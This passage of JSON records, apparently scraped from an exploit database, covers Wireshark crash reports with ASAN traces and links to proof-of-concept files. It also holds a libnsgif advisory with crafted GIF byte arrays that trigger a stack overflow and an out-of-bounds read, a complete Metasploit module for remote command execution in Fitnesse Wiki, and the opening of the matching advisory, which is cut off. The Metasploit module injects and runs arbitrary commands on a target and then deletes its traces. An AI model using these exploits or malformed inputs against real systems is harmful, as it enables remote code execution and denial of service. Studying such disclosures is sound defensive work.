call_dissector_only (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2764\r\n#30 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba4860, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffa080) at packet.c:2777\r\n#31 0x00007fffecb24cac in dissect_sll (tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, \r\n---Type <return> to continue, 
or q <return> to quit---\r\n data=0x61300000df08) at packet-sll.c:291\r\n#32 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x61300000df08) at packet.c:656\r\n#33 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91c5e810, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08) at packet.c:731\r\n#34 0x00007fffeac53d4e in dissector_try_uint_new (sub_dissectors=0x61d000051a40, uint_val=25, \r\n tvb=0x61d0001a74c0, pinfo=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x61300000df08)\r\n at packet.c:1190\r\n#35 0x00007fffeba65106 in dissect_frame (tvb=0x61d0001a74c0, pinfo=0x61400000f058, parent_tree=0x6190001500a0, \r\n data=0x7fffffffc560) at packet-frame.c:492\r\n#36 0x00007fffeac62912 in call_dissector_through_handle (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:656\r\n#37 0x00007fffeac5457b in call_dissector_work (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo_arg=0x61400000f058, tree=0x6190001500a0, add_proto_name=1, data=0x7fffffffc560) at packet.c:731\r\n#38 0x00007fffeac5ea1f in call_dissector_only (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, pinfo=0x61400000f058, \r\n tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2764\r\n#39 0x00007fffeac4f900 in call_dissector_with_data (handle=0x7ffe91ba61b0, tvb=0x61d0001a74c0, \r\n pinfo=0x61400000f058, tree=0x6190001500a0, data=0x7fffffffc560) at packet.c:2777\r\n#40 0x00007fffeac4ecd5 in dissect_record (edt=0x61400000f040, file_type_subtype=1, phdr=0x61300000dea0, \r\n tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at packet.c:539\r\n#41 0x00007fffeac01dba in epan_dissect_run_with_taps (edt=0x61400000f040, file_type_subtype=1, \r\n phdr=0x61300000dea0, tvb=0x61d0001a74c0, fd=0x7fffffffc8a0, cinfo=0x0) at epan.c:376\r\n#42 0x000000000052ef40 in 
process_packet (cf=0x14b82e0 <cfile>, edt=0x61400000f040, offset=2804, \r\n whdr=0x61300000dea0, pd=0x6210000fb500 \"\\300\", tap_flags=0) at tshark.c:3727\r\n#43 0x000000000052830d in load_cap_file (cf=0x14b82e0 <cfile>, save_file=0x0, out_file_type=2, \r\n out_file_name_res=0, max_packet_count=-9, max_byte_count=0) at tshark.c:3483\r\n#44 0x000000000051e67d in main (argc=3, argv=0x7fffffffe268) at tshark.c:2192\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12354. Attached are two files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39749.zip\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25985"}, {"lastseen": "2018-03-20T05:20:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-04-29T00:00:00", "title": "Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T05:20:07", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:N/", "value": 0.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-04-29T00:00:00", "id": "1337DAY-ID-25986", "href": "https://0day.today/exploit/description/25986", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=802\r\n \r\nThe following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==27389==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e9e9a68 at pc 0x7fa9c4c2d7a3 bp 0x7fff6e9e96b0 sp 0x7fff6e9e96a8\r\nWRITE of size 8 at 0x7fff6e9e9a68 thread T0\r\n #0 0x7fa9c4c2d7a2 in dissect_2008_16_security_4 
wireshark/epan/dissectors/packet-dof.c:2662:32\r\n #1 0x7fa9c4c2e3f6 in dof_dissect_pdu wireshark/epan/dissectors/packet-dof.c:12619:16\r\n #2 0x7fa9c4c2ce35 in dof_dissect_pdu_as_field wireshark/epan/dissectors/packet-dof.c:12613:20\r\n #3 0x7fa9c4c2a7ed in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8929:26\r\n #4 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #5 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #6 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #7 0x7fa9c4c68aca in dissect_app_common wireshark/epan/dissectors/packet-dof.c:5405:13\r\n #8 0x7fa9c4c658b6 in dissect_dpp_2 wireshark/epan/dissectors/packet-dof.c:7370:27\r\n #9 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #10 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #11 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #12 0x7fa9c4c3a7a2 in dof_dissect_dpp_common wireshark/epan/dissectors/packet-dof.c:5490:13\r\n #13 0x7fa9c4c5d5c0 in dissect_dnp_1 wireshark/epan/dissectors/packet-dof.c:6676:23\r\n #14 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #15 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #16 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #17 0x7fa9c4c39598 in dof_dissect_dnp_common wireshark/epan/dissectors/packet-dof.c:5528:9\r\n #18 0x7fa9c4c390a0 in dissect_dof_common wireshark/epan/dissectors/packet-dof.c:5627:5\r\n #19 0x7fa9c4c59e5c in dissect_dof_udp wireshark/epan/dissectors/packet-dof.c:5864:12\r\n #20 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #21 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #22 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #23 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9\r\n 
#24 0x7fa9c62dddf0 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:585:7\r\n #25 0x7fa9c62ecd90 in dissect wireshark/epan/dissectors/packet-udp.c:1080:5\r\n #26 0x7fa9c62e0ae0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1086:3\r\n #27 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #28 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #29 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #30 0x7fa9c52a333b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1977:7\r\n #31 0x7fa9c5312dba in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2399:14\r\n #32 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #33 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #34 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #35 0x7fa9c40708f4 in dissector_try_uint wireshark/epan/packet.c:1216:9\r\n #36 0x7fa9c5938ee2 in dissect_null wireshark/epan/dissectors/packet-null.c:457:12\r\n #37 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #38 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #39 0x7fa9c406fd4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9\r\n #40 0x7fa9c4e81105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11\r\n #41 0x7fa9c407e911 in call_dissector_through_handle wireshark/epan/packet.c:656:8\r\n #42 0x7fa9c407057a in call_dissector_work wireshark/epan/packet.c:731:9\r\n #43 0x7fa9c407aa1e in call_dissector_only wireshark/epan/packet.c:2764:8\r\n #44 0x7fa9c406b8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8\r\n #45 0x7fa9c406acd4 in dissect_record wireshark/epan/packet.c:539:3\r\n #46 0x7fa9c401ddb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #47 0x52ef3f in process_packet wireshark/tshark.c:3727:5\r\n #48 0x52830c in load_cap_file wireshark/tshark.c:3483:11\r\n #49 
0x51e67c in main wireshark/tshark.c:2192:13\r\n \r\nAddress 0x7fff6e9e9a68 is located in stack of thread T0 at offset 168 in frame\r\n #0 0x7fa9c4c2945f in dissect_sgmp wireshark/epan/dissectors/packet-dof.c:8718\r\n \r\n This frame has 8 object(s):\r\n [32, 34) 'app'\r\n [48, 52) 'app_len'\r\n [64, 66) 'version'\r\n [80, 84) 'length'\r\n [96, 128) 'key'\r\n [160, 168) 'response' <== Memory access at offset 168 overflows this variable\r\n [192, 194) 'version129'\r\n [208, 212) 'length130'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/epan/dissectors/packet-dof.c:2662:32 in dissect_2008_16_security_4\r\nShadow bytes around the buggy address:\r\n 0x10006dd352f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35330: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 02 f2 04 f2\r\n=>0x10006dd35340: 02 f2 04 f2 00 00 00 00 f2 f2 f2 f2 00[f2]f2 f2\r\n 0x10006dd35350: 02 f2 04 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x10006dd35390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init 
order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==27389==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12351. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39748.zip\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25986"}, {"lastseen": "2018-04-08T11:42:21", "references": [], "description": "Libnsgif version 0.1.2 suffers from stack overflow and out-of-bounds read vulnerabilities.", "edition": 2, "reporter": "Hans Jerry Illikainen", "published": "2015-12-17T00:00:00", "title": "Libnsgif 0.1.2 Stack Overflow / Out-Of-Bounds Read Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-08T11:42:21", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:C/", "value": 5.7}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7505", "CVE-2015-7506"], "modified": "2015-12-17T00:00:00", "id": "1337DAY-ID-24744", "href": "https://0day.today/exploit/description/24744", "sourceData": "Overview\r\n========\r\n\r\nLibnsgif[1] is a decoding library for GIF images. 
It is primarily\r\ndeveloped and used as part of the NetSurf project.\r\n\r\nAs of version 0.1.2, libnsgif is vulnerable to a stack overflow\r\n(CVE-2015-7505) and an out-of-bounds read (CVE-2015-7506) due to the way\r\nLZW-compressed GIF data is processed.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nsrc/libnsgif.c #80..133:\r\n,----\r\n| /* Maximum LZW bits available\r\n| */\r\n| #define GIF_MAX_LZW 12\r\n| [...]\r\n| static int table[2][(1 << GIF_MAX_LZW)];\r\n| static unsigned char stack[(1 << GIF_MAX_LZW) * 2];\r\n`----\r\n\r\nsrc/libnsgif.c #423..628:\r\n,----\r\n| static gif_result gif_initialise_frame(gif_animation *gif) {\r\n| [...]\r\n| if (gif_data[0] > GIF_MAX_LZW)\r\n| return GIF_DATA_ERROR;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #751..1053:\r\n,----\r\n| gif_result gif_decode_frame(gif_animation *gif, unsigned int frame) {\r\n| [...]\r\n| /* Initialise the LZW decoding\r\n| */\r\n| set_code_size = gif_data[0];\r\n| [...]\r\n| code_size = set_code_size + 1;\r\n| clear_code = (1 << set_code_size);\r\n| end_code = clear_code + 1;\r\n| max_code_size = clear_code << 1;\r\n| max_code = clear_code + 2;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1145..1169:\r\n,----\r\n| void gif_init_LZW(gif_animation *gif) {\r\n| [...]\r\n| *stack_pointer++ =firstcode;\r\n| }\r\n`----\r\n\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| code = gif_next_code(gif, code_size);\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| \r\n| /* The following loop is the most important in the GIF decoding cycle as every\r\n| * single pixel passes through it.\r\n| *\r\n| * Note: our stack is always big enough to hold a complete decompressed chunk. 
*/\r\n| while (code >= clear_code) {\r\n| *stack_pointer++ = table[1][code];\r\n| new_code = table[0][code];\r\n| if (new_code < clear_code) {\r\n| code = new_code;\r\n| break;\r\n| }\r\n| *stack_pointer++ = table[1][new_code];\r\n| code = table[0][new_code];\r\n| if (code == new_code) {\r\n| gif->current_error = GIF_FRAME_DATA_ERROR;\r\n| return false;\r\n| }\r\n| }\r\n| \r\n| *stack_pointer++ = firstcode = table[1][code];\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\n\r\nCVE-2015-7505\r\n=============\r\n\r\nSince `gif_next_LZW()' writes onto the stack so long as `code' is at\r\nleast `clear_code', an overflow may eventually occur while processing a\r\nmaliciously crafted image.\r\n\r\nUsing NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x stack.py --args ./nsgtk stack.gif\r\n| [...]\r\n| stack overflow: ptr: 0x968903, end of stack: 0x968900 (+3)\r\n| stack overflow: ptr: 0x968904, end of stack: 0x968900 (+4)\r\n| stack overflow: ptr: 0x968905, end of stack: 0x968900 (+5)\r\n| stack overflow: ptr: 0xf0000968906, end of stack: 0x968900 (+16492674416646)\r\n| \r\n| Program received signal SIGSEGV, Segmentation fault.\r\n| 0x000000000051a890 in gif_next_LZW (gif=0xbccc00) at src/libnsgif.c:1210\r\n| 1210 *stack_pointer++ = table[1][code];\r\n| (gdb)\r\n`----\r\n\r\n\r\nstack.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return 
False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\nstack.gif:\r\n,----\r\n| unsigned char stack[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x04, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nCVE-2015-7506\r\n=============\r\n\r\nIf `set_code_size' is 0xc, `clear_code' is assigned a value of 4096.\r\nSince the while-loop in `gif_next_LZW()' executes so long as `code >=\r\nclear_code', an out-of-bounds read might occur due to `code' being used\r\nto dereference `table' (2d array * 4096). 
A boundary check exist in\r\nthat if `code >= max_code', it's assigned the value of `oldcode' --\r\nhowever, the result may still exceed `max_code' due to the bookkeeping\r\nof the *original* value:\r\n\r\nsrc/libnsgif.c #1172..1237:\r\n,----\r\n| static bool gif_next_LZW(gif_animation *gif) {\r\n| [...]\r\n| incode = code;\r\n| if (code >= max_code) {\r\n| *stack_pointer++ = firstcode;\r\n| code = oldcode;\r\n| }\r\n| [...]\r\n| oldcode = incode;\r\n| [...]\r\n| }\r\n`----\r\n\r\nAgain, using NetSurf as an example:\r\n\r\n,----\r\n| ~/netsurf-all-3.3/netsurf$ gdb -x oob.py --args ./nsgtk oob.gif\r\n| [...]\r\n| out-of-bounds read: code: 6670 (+2575)\r\n| out-of-bounds read: code: 7999 (+3904)\r\n`----\r\n\r\n\r\noob.py:\r\n,----\r\n| class Breakpoint(gdb.Breakpoint):\r\n| def stop(self):\r\n| stack_pointer = get_hex(\"stack_pointer\")\r\n| stack = get_hex(\"&stack\")\r\n| stack_size = get_hex(\"sizeof stack / sizeof *stack\")\r\n| stack_end = stack + stack_size\r\n| \r\n| table_size = get_hex(\"sizeof table / sizeof **table / 2\")\r\n| code = get_hex(\"code\")\r\n| \r\n| if stack_pointer > stack_end:\r\n| print(\"stack overflow: ptr: 0x%x, end of stack: 0x%x (+%d)\" %\r\n| (stack_pointer, stack_end, stack_pointer - stack_end))\r\n| if code >= table_size:\r\n| print(\"out-of-bounds read: code: %d (+%d)\" %\r\n| (code, code - table_size + 1))\r\n| return False\r\n| \r\n| def get_hex(arg):\r\n| res = gdb.execute(\"print/x %s\" % arg, to_string=True)\r\n| x = res.split(\" \")[-1].strip()\r\n| return int(x, 16)\r\n| \r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1210\")\r\n| Breakpoint(\"netsurf-all-3.3/libnsgif/src/libnsgif.c:1216\")\r\n| \r\n| gdb.execute(\"run\")\r\n`----\r\n\r\n\r\noob.gif:\r\n,----\r\n| unsigned char oob[] = {\r\n| /* GIF87a */\r\n| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,\r\n| \r\n| /* gif_initialise() */\r\n| 0x04, 0x00, /* gif->width */\r\n| 0x04, 0x33, /* gif->height */\r\n| 0x00, /* gif->global_colours */\r\n| 0x00, /* 
gif->background_index */\r\n| 0x00, /* gif->aspect_ratio */\r\n| \r\n| /* gif_initialise_frame() */\r\n| 0x2c, /* GIF_IMAGE_SEPARATOR */\r\n| 0x00, 0x00, /* offset_x */\r\n| 0x00, 0x00, /* offset_y */\r\n| 0x1b, 0x00, /* width */\r\n| 0x04, 0x00, /* height */\r\n| 0x00, /* flags */\r\n| 0x0c, /* code size */\r\n| 0x0d, /* block_size */\r\n| \r\n| /* image data */\r\n| 0x10, 0xcb,\r\n| 0x41, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3, 0xf3,\r\n| 0xf3,\r\n| \r\n| /* end of image data */\r\n| 0x00,\r\n| \r\n| /* end of .gif */\r\n| 0x3b\r\n| };\r\n`----\r\n\r\n\r\nSolution\r\n========\r\n\r\nBoth vulnerabilities are fixed in git HEAD[2].\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24744"}, {"lastseen": "2018-01-02T19:03:04", "references": [], "description": "This Metasploit module exploits a vulnerability found in Fitnesse Wiki, version 20140201 and earlier.", "edition": 2, "reporter": "secpod", "published": "2014-03-29T00:00:00", "title": "Fitnesse Wiki Remote Command Execution Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T19:03:04", "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C/", "value": 6.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-29T00:00:00", "id": "1337DAY-ID-22084", "href": "https://0day.today/exploit/description/22084", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Fitnesse Wiki Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Fitnesse Wiki, version 20140201\r\n and earlier.\r\n },\r\n 'Author' =>\r\n [\r\n 
'Jerzy Kramarz', ## Vulnerability discovery\r\n 'Veerendra G.G <veerendragg {at} secpod.com>', ## Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1216' ],\r\n [ 'OSVDB', '103907' ],\r\n [ 'BID', '65921' ],\r\n [ 'URL', 'http://secpod.org/blog/?p=2311' ],\r\n [ 'URL', 'http://secpod.org/msf/fitnesse_wiki_rce.rb' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2014/Mar/1' ],\r\n [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1216/' ]\r\n ],\r\n \r\n 'Privileged' => false,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\",\r\n 'DisableNops' => true,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd', ##\r\n ##'RequiredCmd' => 'generic telnet',\r\n ## payloads cmd/windows/adduser and cmd/windows/generic works perfectly\r\n }\r\n },\r\n 'Platform' => %w{ win },\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['Windows', { 'Platform' => 'win' } ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 25 2014'))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('TARGETURI', [true, 'Fitnesse Wiki base path', '/'])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n print_status(\"#{peer} - Trying to detect Fitnesse Wiki\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n \r\n if res && res.code == 200 && res.body.include?(\">FitNesse<\")\r\n print_good(\"#{peer} - FitNesse Wiki Detected!\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def http_send_command(command)\r\n \r\n ## Construct random page in WikiWord format\r\n uri = normalize_uri(target_uri.path, 'TestP' + rand_text_alpha_lower(7))\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?edit\"\r\n })\r\n \r\n if !res || res.code != 200\r\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, exploit probably 
failed!\")\r\n end\r\n \r\n print_status(\"#{peer} - Retrieving edit time and ticket id\")\r\n \r\n ## Get Edit Time and Ticket Id from the response\r\n res.body =~ /\"editTime\" value=\"((\\d)+)\"/\r\n edit_time = $1\r\n \r\n res.body =~ /\"ticketId\" value=\"((-?\\d)+)\"/\r\n ticket_id = $1\r\n \r\n ## Validate we are able to extract Edit Time and Ticket Id\r\n if !edit_time or !ticket_id\r\n print_error(\"#{peer} - Failed to get Ticket Id / Edit Time.\")\r\n return\r\n end\r\n \r\n print_status(\"#{peer} - Attempting to create '#{uri}'\")\r\n \r\n ## Construct Referer\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?edit\"\r\n \r\n ## Construct command to be executed\r\n page_content = '!define COMMAND_PATTERN {%m}\r\n!define TEST_RUNNER {' + command + '}'\r\n \r\n print_status(\"#{peer} - Injecting the payload\")\r\n ## Construct POST request to create page with malicious commands\r\n ## inserted in the page\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri,\r\n 'method' => 'POST',\r\n 'headers' => {'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'editTime' => edit_time,\r\n 'ticketId' => ticket_id,\r\n 'responder' => 'saveData',\r\n 'helpText' => '',\r\n 'suites' => '',\r\n '__EDITOR__1' => 'textarea',\r\n 'pageContent' => page_content,\r\n 'save' => 'Save',\r\n }\r\n })\r\n \r\n if res && res.code == 303\r\n print_status(\"#{peer} - Successfully created '#{uri}' with payload\")\r\n end\r\n \r\n ## Execute inserted command\r\n print_status(\"#{peer} - Sending exploit request\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri + \"?test\"\r\n })\r\n \r\n if res && res.code == 200\r\n print_status(\"#{peer} - Successfully sent exploit request\")\r\n end\r\n \r\n ## Cleanup by deleting the created page\r\n print_status(\"#{peer} - Execting cleanup routine\")\r\n referer = \"http://#{rhost}:#{rport}\" + uri + \"?deletePage\"\r\n res = send_request_cgi(\r\n {\r\n 'uri' => uri + \"?deletePage\",\r\n 'method' => 'POST',\r\n 'headers' => 
{'Referer' => referer},\r\n 'vars_post' =>\r\n {\r\n 'confirmed' => 'Yes',\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n http_send_command(payload.encoded)\r\n end\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22084"}, {"lastseen": "2018-01-08T23:04:55", "references": [], "description": "Fitnesse Wiki 20131110 suffers from a remote command execution vulnerability.", "edition": 2, "reporter": "Jerzy Kramarz", "published": "2014-03-02T00:00:00", "title": "Fitnesse Wiki 20131110 Remote Command Execution", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-08T23:04:55", "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/", "value": 9.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1216"], "modified": "2014-03-02T00:00:00", "id": "1337DAY-ID-21972", "href": "https://0day.today/exploit/description/21972", "sourceData": "Vulnerability title: Remote Command Execution in Fitnesse Wiki\r\nCVE: CVE-2014-1216\r\nVendor: Fitnesse\r\nProduct: Wiki\r\nAffected version: v20131110 and earlier\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nThe Fitnesse wiki does not validate the syntax of edited pages to\r\nvalidate whether the pages are introducing any extra parameters that\r\ncould be executed in the context of the application. 
